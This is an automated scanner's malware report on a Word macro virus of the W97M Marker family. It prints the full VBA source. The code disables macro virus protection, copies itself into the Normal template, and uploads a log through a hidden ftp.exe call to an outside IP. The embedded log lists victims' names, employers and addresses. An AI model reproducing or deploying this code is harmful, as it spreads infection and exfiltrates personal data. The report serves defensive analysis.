MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The sample contains VBA macros that exhibit self-replication and tampering with macro protection settings. The script attempts to download a file from 'o 209.201.88.110' and save it as 'c:\netldx.vxd', and also writes a marker to 'c:\hsf*.sys'. These actions suggest the macro is designed to download and execute a second-stage payload, indicative of a downloader or droppper malware.
Heuristics 5
-
ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-31
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
'Switch the VirusProtection OFF Options.VirusProtection = False -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://earthobservatory.nasa.gov/IOTD/view.php?id=38803 In document text (OLE body)
- http://earthobservatory.nasa.gov/IOTD/view.php?id=6096In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5275 bytes |
SHA-256: 5bf099ecdcf08d56894fa315a8bfa608be122f7cf37dc53646e407125bf16b3b |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' 09:08:36 - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'
' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'
' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'
' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'
' 11:27:50 AM - Monday, 28 Dec 1998
' Marsha Spitz
' Marsha Spitz
' 6th Floor
' Blue Cross and Blue Shield Assn.
' 225 N. Michigan Ave.
' Chicago, IL 60601
' 01:52:17 PM - Wednesday, 30 Dec 1998
' BCBSA
'
' 11:31:34 AM - Wednesday, 6 Jan 1999
' Sara Tegethoff
'
' 09:47:44 AM - Thursday, 7 Jan 1999
' stompkin
'
' 06:03:14 PM - Wednesday, 20 Jan 1999
' Preferred User
'
' 10:14:39 AM - Monday, 25 Jan 1999
' Invesco
'
' 08:50:38 AM - Thursday, 28 Jan 1999
' Toby Cromwell
'
' 08:44:33 PM - Wednesday, 17 Feb 1999
' Employee Benefits Sales
'
' 12:02:11 PM - Saturday, 13 Mar 1999
' David C. Ryding
'
' 03:27:09 PM - Friday, 16 Apr 1999
' Christine Rolik
'
' 09:20:47 AM - Thursday, 29 Jul 1999
' Dave Ryding
'
' 10:34:01 AM - Friday, 13 Aug 1999
' Sharon Meinhart
'
' 09:23:53 PM - Tuesday, 2 Nov 1999
' Betty Boyce
'
' 07:53:55 AM - Friday, 17 Nov 2000
' Matt
' Manning Park Youth Center
' Renovation Project
' 480 Pimiento Lane
' Santa Barbara, CA 93108
' 07:25:14 PM - Thursday, 28 Dec 2000
' Matt
' Keller / Shapero Family
' 480 Pimiento Lane
' Santa Barbara, CA 93108
' 09:24:03 PM - Friday, 14 Dec 2001
' Robert Jay Ladd-Reinfrank
'
' 04:56:38 AM - Wednesday, 22 Mar 2006
' Jay LR
'
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.